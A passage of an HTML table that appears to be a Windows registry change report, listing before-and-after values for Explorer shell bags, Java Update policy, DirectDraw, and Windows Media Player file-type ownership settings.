<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,34,00,38,00,20,bf,84,14,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,34,00,38,00,00,f8,1e,0a,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU</span></td>
<td><span style="color: black; font-size: xx-small;">NodeSlots</span></td>
<td><span style="color: black; font-size: xx-small;">hex:02,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:02,02,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU</span></td>
<td><span style="color: black; font-size: xx-small;">MRUListEx</span></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,ff,ff,ff,ff,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,00,00,00,00,ff,ff,ff,ff,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU</span></td>
<td><span style="color: black; font-size: xx-small;">1</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:14,00,1f,48,ba,8f,0d,45,25,ad,d0,11,98,a8,08,00,36,1b,11,03,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1</span></td>
<td><span style="color: black; font-size: xx-small;">NodeSlot</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1</span></td>
<td><span style="color: black; font-size: xx-small;">MRUListEx</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:ff,ff,ff,ff,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\2</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\2\Shell</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\2\Shell</span></td>
<td><span style="color: black; font-size: xx-small;">FolderType</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"MyDocuments"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@explorer.exe,-7004</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Opens your Internet browser."</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@shell32.dll,-12704</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Internet P&roperties"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">UpdateTitle1</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Java Update Available"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">DlgCaption</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Java Update - Update Available"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">MoreInfoTxt</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"More information..."</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">InstalledJREVersion</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"1.6.0_29"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">NewJREVersion</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"1.6.0_35-b10"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">PreDownldStatus</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000012</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">UpdAvailNotifyCnt</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">UpdAvailNotifyTime</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0005b708</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication</span></td>
<td><span style="color: black; font-size: xx-small;">Name</span></td>
<td><span style="color: black; font-size: xx-small;">"mshta.exe"</span></td>
<td><span style="color: black; font-size: xx-small;">"wmplayer.exe"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication</span></td>
<td><span style="color: black; font-size: xx-small;">ID</span></td>
<td><span style="color: black; font-size: xx-small;">dword:49b3ac74</span></td>
<td><span style="color: black; font-size: xx-small;">dword:48025cf1</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">MyPlayLists</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\All Users\Documents\My Music\Sample Playlists"</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\All Users\Documents\My Music\Sample Playlists"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Devices\AudioCD</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.aif</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.aifc</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.aiff</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.asf</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.asx</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.au</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.avi</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.cda</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.dvr-ms</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.m1v</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.m3u</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mid</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.midi</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mp2</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mp2v</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mp3</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mpa</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mpe</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mpeg</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mpg</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mpv2</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.rmi</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.snd</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wav</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wax</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wm</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wma</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wmd</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wmv</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wmx</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wmz</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wpl</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wvx</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\application/vnd.ms-wpl</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\application/x-mplayer2</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\application/x-ms-wmd</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\application/x-ms-wmz</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/aiff</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/basic</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/mid</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/midi</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/mp3</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/mpeg</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/mpegurl</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/mpg</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/wav</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-aiff</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-mid</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-midi</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-mp3</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-mpeg</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-mpegurl</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-mpg</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-ms-wax</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-ms-wma</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-wav</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\midi/mid</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/avi</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/mpeg</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/mpg</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/msvideo</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-mpeg</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
